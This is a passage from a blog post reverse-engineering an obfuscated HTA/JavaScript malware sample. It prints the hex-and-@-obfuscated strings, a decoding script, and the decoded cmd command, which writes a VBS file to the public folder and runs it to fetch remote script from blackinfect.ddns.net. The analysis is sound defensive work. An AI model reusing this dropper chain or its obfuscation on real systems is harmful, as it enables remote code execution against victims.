        "\x40\x40\x40\x63\x40\x40\x6D\x40\x40\x40\x64\x40\x40\x20\x40\x40\x2F\x40\x40\x56\x40\x40\x40\x40\x2F\x40\x40\x44\x40\x40\x2F\x40\x40\x40\x40\x63\x40\x40\x20\x40\x40\x73\x40\x40\x74\x40\x40\x40\x61\x40\x40\x72\x40\x40\x74\x40\x40\x20\x40\x40\x40\x25\x40\x40\x40\x70\x40\x40\x75\x40\x40\x40\x62\x40\x40\x6C\x40\x40\x40\x40\x69\x40\x40\x63\x40\x25\x40\x40\x5C\x40\x5C\x40\x53\x40\x40\x4B\x40\x40\x40\x7A\x40\x34\x40\x38\x40\x33\x40\x40\x40\x36\x40\x40\x2E\x40\x40\x40\x76\x62\x40\x40\x40\x73"]

    var yEiZU47 = new ActiveXObject(Bfnq6M43(_$_N7nuQ8464[1]));
    yEiZU47[Bfnq6M43(_$_N7nuQ8464[2])](Bfnq6M43(_$_N7nuQ8464[3]),0);

}

function Bfnq6M43(VSxEf79) {
    var roQ54 = new RegExp('@', 'g');
    var AA7ldSL23 = VSxEf79.replace(roQ54, '');
    return AA7ldSL23;
}


  </script>

If we shift our attention to the scripting block with Javascript code we can see some more interesting stuff. The first function Vw3eX8X29() contains a variable named _$_N7nuQ846 that contains 7 strings. These strings are declared encoding the characters in hexadecimal.

After that the script creates variable yEiZU47 that contains an ActiveXObject with the result of calling the function Bfnq6M43() declared after. Lets shift our attention to the next function.

Function Bfnq6M43() grabs an input variable, presumably of type String since its the one supplying when called in previous function Vw3eX8X29() . The function creates a reg expression var roQ54 = new RegExp('@', 'g'); and uses the reg expression to replace all characters of the supplied string and returns the result.

So what does the regex do exactly?

  • @: This is the regular expression pattern. It will match the "@" character.

  • 'g': This is the flag for global matching. When set, the regular expression will match all occurrences of the pattern in the given string, not just the first one.

After understanding this function we can now try to decode the string to know what function Vw3eX8X29() is doing.

In order to decode we can just create a separate script with the code of function Bfnq6M43() and supply it the strings.



var output0 = Bfnq6M43("\x40\x40\x62\x40\x40\x6C\x40\x61\x40\x40\x63\x40\x40\x40\x40\x6B\x40\x69\x40\x40\x6E\x40\x66\x40\x65\x40\x40\x63\x40\x74\x40\x40\x40\x40\x2E\x40\x64\x40\x40\x64\x40\x40\x6E\x40\x40\x73\x2E\x40\x40\x40\x6E\x40\x40\x40\x65\x40\x74");
var output1 = Bfnq6M43("\x40\x57\x40\x40\x53\x40\x40\x40\x63\x40\x40\x40\x72\x40\x40\x69\x40\x40\x40\x70\x40\x40\x40\x74\x40\x2E\x40\x53\x40\x40\x68\x40\x40\x65\x40\x40\x40\x40\x6C\x40\x40\x40\x6C");
var output2 = Bfnq6M43("\x40\x40\x40\x72\x40\x40\x40\x75\x40\x40\x6E");
var output3 = Bfnq6M43("\x40\x40\x40\x40\x63\x40\x40\x40\x6D\x40\x40\x64\x40\x40\x40\x20\x40\x2F\x40\x40\x40\x56\x40\x2F\x40\x40\x44\x40\x2F\x40\x40\x40\x63\x40\x20\x65\x40\x63\x40\x68\x40\x6F\x40\x7C\x40\x40\x40\x73\x40\x40\x40\x65\x40\x40\x74\x40\x40\x40\x20\x40\x40\x40\x2F\x40\x40\x70\x40\x40\x40\x3D\x40\x40\x5E\x40\x40\x40\x40\x22\x40\x41\x40\x40\x6D\x40\x40\x40\x68\x40\x40\x63\x40\x40\x40\x70\x40\x40\x52\x40\x40\x36\x40\x31\x3D\x40\x22\x40\x2E\x40\x40\x40\x40\x22\x40\x3A\x40\x40\x67\x40\x40\x4B\x40\x40\x46\x40\x40\x50\x40\x30\x40\x33\x40\x40\x39\x40\x40\x3D\x40\x40\x40\x40\x22\x40\x40\x69\x22\x40\x40\x3A\x40\x4D\x40\x59\x40\x40\x40\x55\x40\x40\x6E\x40\x40\x4F\x40\x40\x6B\x40\x39\x40\x36\x40\x3D\x40\x40\x22\x40\x40\x67\x40\x40\x40\x40\x22\x40\x40\x3A\x40\x40\x47\x40\x40\x6C\x40\x40\x76\x40\x40\x38\x40\x40\x30\x40\x3D\x40\x40\x40\x40\x22\x40\x3A\x40\x22\x40\x40\x3A\x40\x40\x47\x40\x40\x40\x65\x40\x40\x74\x40\x4F\x40\x5E\x40\x40\x40\x22\x40\x3E\x40\x40\x40\x25\x40\x40\x70\x40\x40\x40\x75\x40\x40\x62\x40\x40\x6C\x40\x40\x40\x40\x69\x40\x40\x63\x40\x40\x40\x40\x25\x40\x40\x5C\x5C\x40\x40\x40\x53\x4B\x40\x40\x7A\x40\x40\x40\x34\x40\x38\x40\x33\x40\x36\x2E\x40\x40\x40\x76\x40\x40\x62\x40\x73\x40\x40\x40\x26\x40\x65\x40\x40\x40\x63\x40\x40\x40\x40\x68\x40\x40\x40\x40\x6F\x40\x40\x7C\x40\x40\x40\x73\x40\x40\x40\x40\x65\x40\x40\x40\x74\x40\x40\x20\x2F\x40\x40\x70\x40\x40\x40\x3D\x40\x40\x40\x40\x5E\x40\x40\x22\x40\x40\x62\x40\x40\x40\x6A\x40\x40\x40\x65\x63\x40\x40\x74\x40\x40\x28\x40\x40\x40\x22\x73\x40\x40\x43\x40\x40\x72\x40\x40\x22\x40\x40\x40\x2B\x40\x40\x67\x40\x4B\x40\x46\x40\x40\x40\x50\x40\x40\x40\x30\x40\x40\x33\x40\x40\x40\x39\x40\x40\x2B\x40\x22\x40\x40\x40\x70\x40\x74\x40\x40\x22\x40\x2B\x40\x40\x47\x40\x40\x40\x6C\x40\x40\x40\x76\x40\x40\x38\x30\x40\x40\x40\x2B\x40\x40\x22\x40\x68\x54\x40\x22\x40\x2B\x40\x40\x22\x54\x40\x70\x40\x40\x40\x40\x73\x40\x22\x40\x40\x40\x40\x2B\x40\x47\x40\x40\x40\x40\x6C\x40\x40\x76\x40\x40\x38\x40\x30\x40\x2B\x40\x22\x2F\x40\x40\x40\x2F\x40\x62\x40\x6C\x61\x40\x40\x63\x6B\x40\x40\x69\x40\x6E\x40\x40\x66\x40\x65\x40\x40\x63\x40\x40\x40\x74\x40\x40\x40\x22\x40\x40\x2B\x40\x40\x41\x40\x40\x40\x6D\x40\x40\x40\x40\x68\x40\x63\x40\x70\x40\x52\x40\x40\x36\x40\x40\x40\x31\x40\x40\x40\x40\x2B\x40\x40\x40\x22\x40\x64\x40\x40\x64\x40\x40\x40\x6E\x73\x40\x40\x22\x40\x40\x2B\x40\x40\x40\x41\x40\x40\x40\x6D\x40\x40\x68\x40\x63\x40\x40\x40\x70\x40\x40\x52\x40\x40\x36\x40\x40\x40\x31\x40\x40\x40\x40\x2B\x40\x22\x40\x6E\x40\x40\x40\x65\x40\x74\x40\x40\x40\x2F\x40\x40\x40\x2F\x40\x22\x40\x40\x2B\x40\x40\x40\x4D\x40\x59\x40\x55\x40\x40\x40\x6E\x40\x40\x40\x40\x4F\x40\x40\x6B\x40\x39\x40\x40\x40\x40\x36\x40\x2B\x40\x22\x40\x40\x31\x40\x22\x40\x40\x29\x40\x40\x40\x5E\x40\x22\x40\x40\x3E\x40\x40\x3E\x40\x40\x40\x25\x40\x70\x40\x40\x75\x40\x40\x40\x62\x40\x6C\x40\x40\x40\x69\x40\x40\x63\x40\x40\x40\x25\x40\x40\x40\x5C\x40\x40\x40\x40\x5C\x40\x40\x40\x53\x40\x4B\x40\x40\x7A\x40\x40\x34\x40\x38\x40\x40\x40\x33\x40\x40\x40\x40\x36\x40\x40\x2E\x40\x76\x40\x40\x40\x62\x40\x40\x73\x40\x40\x26\x40\x40\x63\x40\x40\x40\x40\x3A\x40\x40\x5C\x40\x40\x5C\x40\x40\x77\x40\x69\x40\x6E\x40\x40\x64\x40\x40\x40\x6F\x40\x40\x77\x40\x40\x73\x40\x5C\x40\x5C\x40\x40\x73\x40\x40\x79\x40\x40\x73\x40\x40\x40\x40\x74\x40\x40\x40\x40\x65\x40\x40\x40\x6D\x40\x40\x40\x40\x33\x40\x32\x5C\x40\x40\x5C\x40\x40\x40\x63\x40\x6D\x40\x64\x40\x2E\x40\x65\x40\x40\x78\x65\x40\x20\x40\x2F\x40\x63\x40\x40\x20\x40\x40\x73\x40\x74\x40\x61\x40\x40\x72\x40\x40\x74\x40\x40\x20\x40\x43\x40\x3A\x40\x40\x5C\x40\x5C\x40\x55\x40\x40\x40\x73\x40\x40\x40\x65\x40\x40\x40\x72\x40\x73\x40\x40\x5C\x40\x40\x5C\x40\x50\x40\x40\x75\x40\x40\x62\x40\x40\x6C\x40\x40\x40\x69\x40\x40\x63\x40\x40\x40\x5C\x40\x40\x5C\x40\x40\x53\x40\x40\x4B\x40\x7A\x40\x40\x34\x40\x40\x38\x40\x40\x33\x40\x40\x40\x36\x40\x2E\x40\x40\x40\x76\x40\x62\x40\x73");
var output4 = Bfnq6M43("\x40\x40\x40\x50\x40\x6F\x40\x40\x70\x40\x40\x75\x40\x40\x40\x70");
var output5 = Bfnq6M43("\x40\x40\x40\x45\x40\x72\x40\x72\x40\x6F\x40\x40\x72\x20\x40\x40\x28\x40\x40\x63\x40\x40\x6F\x40\x40\x64\x40\x40\x40\x20\x40\x25\x40\x40\x73\x40\x40\x40\x72\x40\x61\x40\x40\x6E\x40\x40\x64\x40\x40\x40\x25\x40\x40\x29");
var output6 = Bfnq6M43("\x40\x40\x40\x63\x40\x40\x6D\x40\x40\x40\x64\x40\x40\x20\x40\x40\x2F\x40\x40\x56\x40\x40\x40\x40\x2F\x40\x40\x44\x40\x40\x2F\x40\x40\x40\x40\x63\x40\x40\x20\x40\x40\x73\x40\x40\x74\x40\x40\x40\x61\x40\x40\x72\x40\x40\x74\x40\x40\x20\x40\x40\x40\x25\x40\x40\x40\x70\x40\x40\x75\x40\x40\x40\x62\x40\x40\x6C\x40\x40\x40\x40\x69\x40\x40\x63\x40\x25\x40\x40\x5C\x40\x5C\x40\x53\x40\x40\x4B\x40\x40\x40\x7A\x40\x34\x40\x38\x40\x33\x40\x40\x40\x36\x40\x40\x2E\x40\x40\x40\x76\x62\x40\x40\x40\x73");

console.log("Obfuscated 1 = " + output1);

console.log("Obfuscated 2 = " + output2);
console.log("Obfuscated 3 = " + output3);
console.log("Obfuscated 4 = " + output4);
console.log("Obfuscated 5 = " + output5);
console.log("Obfuscated 6 = " + output6);

function Bfnq6M43(VSxEf79) {
  var roQ54 = new RegExp('@', 'g');
  var AA7ldSL23 = VSxEf79.replace(roQ54, '');
  return AA7ldSL23;
}

When executed this returns the following output:

Obfuscated 1 = WScript.Shell

Obfuscated 2 = run

Obfuscated 3 = cmd /V/D/c echo|set /p=^"AmhcpR61=".":gKFP039="i":MYUnOk96="g":Glv80=":":GetO^">%public%\\SKz4836.vbs&echo|set /p=^"bject("sCr"+gKFP039+"pt"+Glv80+"hT"+"Tps"+Glv80+"//blackinfect"+AmhcpR61+"ddns"+AmhcpR61+"net//"+MYUnOk96+"1")^">>%public%\\SKz4836.vbs&c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\SKz4836.vbs

Obfuscated 4 = Popup

Obfuscated 5 = Error (cod %srand%)

Obfuscated 6 = cmd /V/D/c start %public%\\SKz4836.vbs

If we now substitute the calls to the function with the strings by the result we will have a better view of what is going on:

function Vw3eX8X29(){
    var _$_N7nuQ8464=["\x40\x40\x62\x40\x40\x6C\x40\x61\x40\x40\x63\x40\x40\x40\x40\x6B\x40\x69\x40\x40\x6E\x40\x66\x40\x65\x40\x40\x63\x40\x74\x40\x40\x40\x40\x2E\x40\x64\x40\x40\x64\x40\x40\x6E\x40\x40\x73\x2E\x40\x40\x40\x6E\x40\x40\x40\x65\x40\x74",
        "\x40\x57\x40\x40\x53\x40\x40\x40\x63\x40\x40\x40\x72\x40\x40\x69\x40\x40\x40\x70\x40\x40\x40\x74\x40\x2E\x40\x53\x40\x40\x68\x40\x40\x65\x40\x40\x40\x40\x6C\x40\x40\x40\x6C",
        "\x40\x40\x40\x72\x40\x40\x40\x75\x40\x40\x6E",
        "\x40\x40\x40\x40\x63\x40\x40\x40\x6D\x40\x40\x64\x40\x40\x40\x20\x40\x2F\x40\x40\x40\x56\x40\x2F\x40\x40\x44\x40\x2F\x40\x40\x40\x63\x40\x20\x65\x40\x63\x40\x68\x40\x6F\x40\x7C\x40\x40\x40\x73\x40\x40\x40\x65\x40\x40\x74\x40\x40\x40\x20\x40\x40\x40\x2F\x40\x40\x70\x40\x40\x40\x3D\x40\x40\x5E\x40\x40\x40\x40\x22\x40\x41\x40\x40\x6D\x40\x40\x40\x68\x40\x40\x63\x40\x40\x40\x70\x40\x40\x52\x40\x40\x36\x40\x31\x3D\x40\x22\x40\x2E\x40\x40\x40\x40\x22\x40\x3A\x40\x40\x67\x40\x40\x4B\x40\x40\x46\x40\x40\x50\x40\x30\x40\x33\x40\x40\x39\x40\x40\x3D\x40\x40\x40\x40\x22\x40\x40\x69\x22\x40\x40\x3A\x40\x4D\x40\x59\x40\x40\x40\x55\x40\x40\x6E\x40\x40\x4F\x40\x40\x6B\x40\x39\x40\x36\x40\x3D\x40\x40\x22\x40\x40\x67\x40\x40\x40\x40\x22\x40\x40\x3A\x40\x40\x47\x40\x40\x6C\x40\x40\x76\x40\x40\x38\x40\x40\x30\x40\x3D\x40\x40\x40\x40\x22\x40\x3A\x40\x22\x40\x40\x3A\x40\x40\x47\x40\x40\x40\x65\x40\x40\x74\x40\x4F\x40\x5E\x40\x40\x40\x22\x40\x3E\x40\x40\x40\x25\x40\x40\x70\x40\x40\x40\x75\x40\x40\x62\x40\x40\x6C\x40\x40\x40\x40\x69\x40\x40\x63\x40\x40\x40\x40\x25\x40\x40\x5C\x5C\x40\x40\x40\x53\x4B\x40\x40\x7A\x40\x40\x40\x34\x40\x38\x40\x33\x40\x36\x2E\x40\x40\x40\x76\x40\x40\x62\x40\x73\x40\x40\x40\x26\x40\x65\x40\x40\x40\x63\x40\x40\x40\x40\x68\x40\x40\x40\x40\x6F\x40\x40\x7C\x40\x40\x40\x73\x40\x40\x40\x40\x65\x40\x40\x40\x74\x40\x40\x20\x2F\x40\x40\x70\x40\x40\x40\x3D\x40\x40\x40\x40\x5E\x40\x40\x22\x40\x40\x62\x40\x40\x40\x6A\x40\x40\x40\x65\x63\x40\x40\x74\x40\x40\x28\x40\x40\x40\x22\x73\x40\x40\x43\x40\x40\x72\x40\x40\x22\x40\x40\x40\x2B\x40\x40\x67\x40\x4B\x40\x46\x40\x40\x40\x50\x40\x40\x40\x30\x40\x40\x33\x40\x40\x40\x39\x40\x40\x2B\x40\x22\x40\x40\x40\x70\x40\x74\x40\x40\x22\x40\x2B\x40\x40\x47\x40\x40\x40\x6C\x40\x40\x40\x76\x40\x40\x38\x30\x40\x40\x40\x2B\x40\x40\x22\x40\x68\x54\x40\x22\x40\x2B\x40\x40\x22\x54\x40\x70\x40\x40\x40\x40\x73\x40\x22\x40\x40\x40\x40\x2B\x40\x47\x40\x40\x40\x40\x6C\x40\x40\x76\x40\x40\x38\x40\x30\x40\x2B\x40\x22\x2F\x40\x40\x40\x2F\x40\x62\x40\x6C\x61\x40\x40\x63\x6B\x40\x40\x69\x40\x6E\x40\x40\x66\x40\x65\x40\x40\x63\x40\x40\x40\x74\x40\x40\x40\x22\x40\x40\x2B\x40\x40\x41\x40\x40\x40\x6D\x40\x40\x40\x40\x68\x40\x63\x40\x70\x40\x52\x40\x40\x36\x40\x40\x40\x31\x40\x40\x40\x40\x2B\x40\x40\x40\x22\x40\x64\x40\x40\x64\x40\x40\x40\x6E\x73\x40\x40\x22\x40\x40\x2B\x40\x40\x40\x41\x40\x40\x40\x6D\x40\x40\x68\x40\x63\x40\x40\x40\x70\x40\x40\x52\x40\x40\x36\x40\x40\x40\x31\x40\x40\x40\x40\x2B\x40\x22\x40\x6E\x40\x40\x40\x65\x40\x74\x40\x40\x40\x2F\x40\x40\x40\x2F\x40\x22\x40\x40\x2B\x40\x40\x40\x4D\x40\x59\x40\x55\x40\x40\x40\x6E\x40\x40\x40\x40\x4F\x40\x40\x6B\x40\x39\x40\x40\x40\x40\x36\x40\x2B\x40\x22\x40\x40\x31\x40\x22\x40\x40\x29\x40\x40\x40\x5E\x40\x22\x40\x40\x3E\x40\x40\x3E\x40\x40\x40\x25\x40\x70\x40\x40\x75\x40\x40\x40\x62\x40\x6C\x40\x40\x40\x69\x40\x40\x63\x40\x40\x40\x25\x40\x40\x40\x5C\x40\x40\x40\x40\x5C\x40\x40\x40\x53\x40\x4B\x40\x40\x7A\x40\x40\x34\x40\x38\x40\x40\x40\x33\x40\x40\x40\x40\x36\x40\x40\x2E\x40\x76\x40\x40\x40\x62\x40\x40\x73\x40\x40\x26\x40\x40\x63\x40\x40\x40\x40\x3A\x40\x40\x5C\x40\x40\x5C\x40\x40\x77\x40\x69\x40\x6E\x40\x40\x64\x40\x40\x40\x6F\x40\x40\x77\x40\x40\x73\x40\x5C\x40\x5C\x40\x40\x73\x40\x40\x79\x40\x40\x73\x40\x40\x40\x40\x74\x40\x40\x40\x40\x65\x40\x40\x40\x6D\x40\x40\x40\x40\x33\x40\x32\x5C\x40\x40\x5C\x40\x40\x40\x63\x40\x6D\x40\x64\x40\x2E\x40\x65\x40\x40\x78\x65\x40\x20\x40\x2F\x40\x63\x40\x40\x20\x40\x40\x73\x40\x74\x40\x61\x40\x40\x72\x40\x40\x74\x40\x40\x20\x40\x43\x40\x3A\x40\x40\x5C\x40\x5C\x40\x55\x40\x40\x40\x73\x40\x40\x40\x65\x40\x40\x40\x72\x40\x73\x40\x40\x5C\x40\x40\x5C\x40\x50\x40\x40\x75\x40\x40\x62\x40\x40\x6C\x40\x40\x40\x69\x40\x40\x63\x40\x40\x40\x5C\x40\x40\x5C\x40\x40\x53\x40\x40\x4B\x40\x7A\x40\x40\x34\x40\x40\x38\x40\x40\x33\x40\x40\x40\x36\x40\x2E\x40\x40\x40\x76\x40\x62\x40\x73",
        "\x40\x40\x40\x50\x40\x6F\x40\x40\x70\x40\x40\x75\x40\x40\x40\x70",
        "\x40\x40\x40\x45\x40\x72\x40\x72\x40\x6F\x40\x40\x72\x20\x40\x40\x28\x40\x40\x63\x40\x40\x6F\x40\x40\x64\x40\x40\x40\x20\x40\x25\x40\x40\x73\x40\x40\x40\x72\x40\x61\x40\x40\x6E\x40\x40\x64\x40\x40\x40\x25\x40\x40\x29",
        "\x40\x40\x40\x63\x40\x40\x6D\x40\x40\x40\x64\x40\x40\x20\x40\x40\x2F\x40\x40\x56\x40\x40\x40\x40\x2F\x40\x40\x44\x40\x40\x2F\x40\x40\x40\x40\x63\x40\x40\x20\x40\x40\x73\x40\x40\x74\x40\x40\x40\x61\x40\x40\x72\x40\x40\x74\x40\x40\x20\x40\x40\x40\x25\x40\x40\x40\x70\x40\x40\x75\x40\x40\x40\x62\x40\x40\x6C\x40\x40\x40\x40\x69\x40\x40\x63\x40\x25\x40\x40\x5C\x40\x5C\x40\x53\x40\x40\x4B\x40\x40\x40\x7A\x40\x34\x40\x38\x40\x33\x40\x40\x40\x36\x40\x40\x2E\x40\x40\x40\x76\x62\x40\x40\x40\x73"]

    var yEiZU47 = new ActiveXObject("WScript.Shell"); //Bfnq6M43(_$_N7nuQ8464[1])
    yEiZU47["run"](
        "cmd /V/D/c echo|set /p=^"AmhcpR61=".":gKFP039="i":MYUnOk96="g":Glv80=":":GetO^">%public%\\SKz4836.vbs&echo|set /p=^"bject("sCr"+gKFP039+"pt"+Glv80+"hT"+"Tps"+Glv80+"//blackinfect"+AmhcpR61+"ddns"+AmhcpR61+"net//"+MYUnOk96+"1")^">>%public%\\SKz4836.vbs&c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\SKz4836.vbs",
        0); //Bfnq6M43(_$_N7nuQ8464[2])    //Bfnq6M43(_$_N7nuQ8464[3])

}

Now we can clearly see how the code tries to execute a cmd command.

Now we have to understand what this cmd command is doing.

"cmd /V/D/c echo|set /p=^"AmhcpR61=".":gKFP039="i":MYUnOk96="g":Glv80=":":GetO^">%public%\\SKz4836.vbs&echo|set /p=^"bject("sCr"+gKFP039+"pt"+Glv80+"hT"+"Tps"+Glv80+"//blackinfect"+AmhcpR61+"ddns"+AmhcpR61+"net//"+MYUnOk96+"1")^">>%public%\\SKz4836.vbs&c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\SKz4836.vbs"

  1. cmd /V /D /c: This starts a new Command Prompt process with specific options. /V enables delayed variable expansion, /D disables execution of AutoRun commands from the registry, and /c carries out the command specified by the string.

  2. echo|set /p=^"AmhcpR61=".":gKFP039="i":MYUnOk96="g":Glv80=":":GetO^">%public%\\SKz4836.vbs: This line echoes a series of strings to create a VBS script. The strings include variable assignments and the creation of an object with a URL.

  3. echo|set /p=^"bject("sCr"+gKFP039+"pt"+Glv80+"hT"+"Tps"+Glv80+"//blackinfect"+AmhcpR61+"ddns"+AmhcpR61+"net//"+MYUnOk96+"1")^">>%public%\\SKz4836.vbs: This line appends more content to the VBS script, creating an object with a specific URL.

  4. c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\SKz4836.vbs: Finally, this executes the newly created VBS script using the start command.

Basically the command is creating a VBScript in location C:\\Users\\Public\\SKz4836.vbs and then executes it.

If we execute the part of the command that creates the script, the file generated looks like the following.

AmhcpR61=".":gKFP039="i":MYUnOk96="g":Glv80=":":GetObject("sCr"+gKFP039+"pt"+Glv80+"hT"+"Tps"+Glv80+"//blackinfect"+AmhcpR61+"ddns"+AmhcpR61+"net//"+MYUnOk96+"1")

If we beautify it a bit we get the following:

AmhcpR61 = "."
gKFP039 = "i"
MYUnOk96 = "g"
Glv80 = ":"
GetObject("sCr" + gKFP039 + "pt" + Glv80 + "hT" + "Tps" + Glv80 + "//blackinfect" + AmhcpR61 + "ddns" + AmhcpR61 + "net//" + MYUnOk96 + "1")

Now lets replace the variable names for the actual strings they store.

GetObject("sCr" + "i" + "pt" + ":" + "hT" + "Tps" + ":" + 
"//blackinfect" + "." + "ddns" + "." + "net//" + "g" + "1")

The code will try to retrieve whatever is pointed by URL

https://blackinfect.ddns.net//g1

The URL is not available and if we try to access it we get an error.

Recap

We can now see what the "malware" does, we know it tried to obfuscate what it was doing and we know it is trying to retrieve an object from URL https://blackinfect.ddns.net//g1 . I don't know what the malware intends to do with the downloaded object, and I was not able to access the URL. I also ignore why the HTML code added all those hidden paragraphs with random characters. My first thought was that it would use those strings later in the object that it tries to downloa, but I cant know for sure. I also did not find any code trying to execute the downloaded object.

While the script might not have any impact on the system since the file it is trying to download is not available and there is no code to execute the file in case it manages to download it, it is clear the script is had malicious intentions. The amount of obfuscation and the objects that was trying to obfuscate clearly shows some monkey business.

💡
If you find something that is wrong or incomplete, please feel free to comment or contact and I will correct it!
#javascript#reversing#hta

Comments

Join the discussion

No comments yet. Be the first to comment.

Reversing software

Part 1 of 1

In this series I will analyse all the software and malware I come across.

More from this blog

Joan E.S

7 posts

Hi I am Joan Esteban Santaeularia a Cybersecurity Engineer. Currently focusing in Web3 security and reverse engineering. I am also a music producer focused on Techno and House.